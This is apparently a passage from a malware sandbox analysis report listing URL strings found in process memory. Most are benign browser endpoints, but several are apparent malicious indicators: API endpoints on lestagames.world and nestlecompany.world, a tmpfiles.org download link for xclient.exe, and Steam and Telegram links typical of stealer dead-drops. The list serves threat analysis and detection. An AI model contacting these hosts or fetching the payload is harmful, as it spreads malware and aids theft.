Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318117825.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000022.00000003.2323606864.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527698275.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318117825.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/1664752735
Source: chrome.exe, 00000022.00000002.2524575070.000078C402A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524271591.000078C4029A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2530312833.000078C403090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522078107.000078C4026E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000022.00000002.2524575070.000078C402A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524271591.000078C4029A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2530312833.000078C403090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522078107.000078C4026E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000022.00000002.2516465849.00006F8C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000022.00000002.2514483466.00006F8C00238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000022.00000003.2306667952.00006F8C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2306481564.00006F8C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2516465849.00006F8C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000022.00000003.2306667952.00006F8C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2306481564.00006F8C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2516465849.00006F8C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000022.00000002.2516156966.00006F8C00904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000022.00000002.2514483466.00006F8C00238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardo
Source: chrome.exe, 00000022.00000002.2516465849.00006F8C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000022.00000002.2521638103.000078C402628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2377675513.000078C403524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2348313968.000078C403970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000022.00000003.2333454752.000078C4032F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333620736.000078C40340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333066892.000078C4025A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000022.00000003.2333454752.000078C4032F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333620736.000078C40340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333066892.000078C4025A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000022.00000003.2307711207.00006F8C00878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333066892.000078C4025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2516238586.00006F8C00920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2516118401.00006F8C008D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000022.00000002.2516465849.00006F8C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000022.00000002.2516238586.00006F8C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000022.00000002.2516238586.00006F8C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: jROrnzx.exe, 00000012.00000002.2336798761.0000000001229000.00000004.00000020.00020000.00000000.sdmp, jROrnzx.exe, 00000012.00000002.2336194833.00000000011E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lestagames.world/
Source: jROrnzx.exe, 00000012.00000002.2336194833.0000000001201000.00000004.00000020.00020000.00000000.sdmp, jROrnzx.exe, 00000012.00000002.2329211901.000000000118B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lestagames.world/api
Source: jROrnzx.exe, 00000012.00000002.2336798761.0000000001229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lestagames.world/d
Source: jROrnzx.exe, 00000012.00000002.2336194833.00000000011E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lestagames.world:443/api
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2526751601.000078C402D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533724179.000078C403238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2518605562.000078C4022EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000022.00000002.2521638103.000078C402628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2377675513.000078C403524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2348313968.000078C403970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000022.00000003.2323606864.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527698275.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533807028.000078C4032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533724179.000078C403238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2518605562.000078C4022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523416672.000078C40289C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533724179.000078C403238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2518605562.000078C4022EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2536277147.000078C403384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533724179.000078C403238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2518605562.000078C4022EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000022.00000002.2524108763.000078C402988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533414027.000078C4031DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522577631.000078C40271C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000022.00000002.2533414027.000078C4031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGAx
Source: chrome.exe, 00000022.00000002.2523936157.000078C40295C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2521638103.000078C402628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527223720.000078C402DBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525215204.000078C402B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000022.00000002.2523936157.000078C40295C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2531401748.000078C4031B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2521638103.000078C402628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525215204.000078C402B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000022.00000002.2531401748.000078C4031B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2521638103.000078C402628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525215204.000078C402B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000022.00000002.2526264891.000078C402C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2328976055.000078C403228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525409166.000078C402BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: Ta3ZyUR.exe, 00000009.00000002.2788978267.000000000145C000.00000004.00000020.00020000.00000000.sdmp, Ta3ZyUR.exe, 00000009.00000002.2790618543.000000000147E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nestlecompany.world/
Source: Ta3ZyUR.exe, 00000009.00000002.2790618543.000000000147E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nestlecompany.world/$
Source: Ta3ZyUR.exe, 00000009.00000002.2790232708.0000000001473000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nestlecompany.world/api
Source: Ta3ZyUR.exe, 00000009.00000002.2790232708.0000000001473000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nestlecompany.world/apik
Source: Ta3ZyUR.exe, 00000009.00000002.2790618543.000000000147E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nestlecompany.world/pi9
Source: Ta3ZyUR.exe, 00000009.00000002.2790618543.000000000147E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nestlecompany.world/piZ
Source: Ta3ZyUR.exe, 00000009.00000002.2788978267.000000000145C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nestlecompany.world:443/api
Source: 7aencsM.exe, 00000018.00000002.2802152564.0000000003991000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMin
Source: 7aencsM.exe, 00000018.00000002.2802152564.0000000003991000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: powershell.exe, 00000020.00000002.2377073806.0000000005D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2687444169.0000000005D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000022.00000002.2537312291.000078C403908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350301639.000078C403518000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2348852833.000078C403944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000022.00000002.2523168058.000078C40281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2528048286.000078C402ED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000022.00000002.2537312291.000078C403908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350301639.000078C403518000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2348852833.000078C403944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000022.00000002.2537312291.000078C403908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350301639.000078C403518000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2348852833.000078C403944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000022.00000002.2528677967.000078C402F88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000022.00000002.2530927306.000078C403128000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2528677967.000078C402F88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000022.00000002.2530927306.000078C403128000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2528619926.000078C402F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2528677967.000078C402F88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000022.00000002.2528677967.000078C402F88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000022.00000002.2530927306.000078C403128000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2528677967.000078C402F88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000022.00000002.2530927306.000078C403128000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2526507578.000078C402CD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2528677967.000078C402F88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000022.00000002.2528677967.000078C402F88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000022.00000002.2522078107.000078C4026E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000022.00000002.2526264891.000078C402C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2328976055.000078C403228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525409166.000078C402BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000022.00000003.2333454752.000078C4032F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333620736.000078C40340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333066892.000078C4025A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000022.00000002.2527316913.000078C402DD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000022.00000002.2527316913.000078C402DD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=truex
Source: chrome.exe, 00000022.00000002.2526264891.000078C402C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2328976055.000078C403228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525409166.000078C402BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000022.00000002.2518279107.000078C402278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000022.00000002.2518518184.000078C4022B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000022.00000002.2524575070.000078C402A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524271591.000078C4029A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2530312833.000078C403090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522078107.000078C4026E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000022.00000002.2524271591.000078C4029A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2530312833.000078C403090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522078107.000078C4026E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000022.00000002.2524575070.000078C402A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactionsp
Source: chrome.exe, 00000022.00000003.2333800848.000078C402494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000022.00000002.2521638103.000078C402628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2348313968.000078C403970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199828130190
Source: 7aencsM.exe, 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199828130190ot0yikamMozilla/5.0
Source: qFqSpAp.exe, 0000000E.00000003.2107114932.0000000004426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: qFqSpAp.exe, 0000000E.00000003.2107114932.0000000004426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g02f04
Source: chrome.exe, 00000022.00000002.2526175676.000078C402C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: skotes.exe, 00000004.00000002.2790672065.000000000116B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.2574663757.000000000116B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.2686800726.000000000116B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/
Source: skotes.exe, 00000004.00000003.2686800726.000000000116B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/20891284/xclient.exe
Source: skotes.exe, 00000004.00000003.2227193904.0000000005BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/20891284/xclient.exe1
Source: skotes.exe, 00000004.00000002.2790672065.000000000116B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.2574663757.000000000116B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.2686800726.000000000116B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/20891284/xclient.exe6
Source: skotes.exe, 00000004.00000002.2790672065.000000000116B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.2574663757.000000000116B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.2686800726.000000000116B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/20891284/xclient.exe60
Source: skotes.exe, 00000004.00000002.2790672065.000000000116B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.2574663757.000000000116B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.2686800726.000000000116B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/20891284/xclient.exeb
Source: qFqSpAp.exe, 0000000E.00000003.2118407844.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, jROrnzx.exe, 00000012.00000002.2329211901.000000000115C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: qFqSpAp.exe, 0000000E.00000003.2069781454.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069870204.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069969508.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2820097256.0000000003E28000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2521881117.000078C4026A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000022.00000003.2323606864.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527698275.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318117825.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000022.00000003.2323606864.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527698275.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318117825.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000022.00000003.2323606864.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527698275.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318117825.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.entrust.net/rpa0
Source: chrome.exe, 00000022.00000003.2333800848.000078C402494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000022.00000002.2536078024.000078C403360000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000022.00000003.2333800848.000078C402494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000022.00000002.2523168058.000078C40281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2322578104.000078C403014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2319279161.000078C403014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525409166.000078C402BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524615543.000078C402A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000022.00000002.2527642540.000078C402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524615543.000078C402A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000022.00000002.2527837520.000078C402E5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000022.00000002.2536402148.000078C4033AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000022.00000002.2525308278.000078C402B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2531401748.000078C4031B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524716075.000078C402A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000022.00000002.2525308278.000078C402B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2531401748.000078C4031B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524716075.000078C402A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
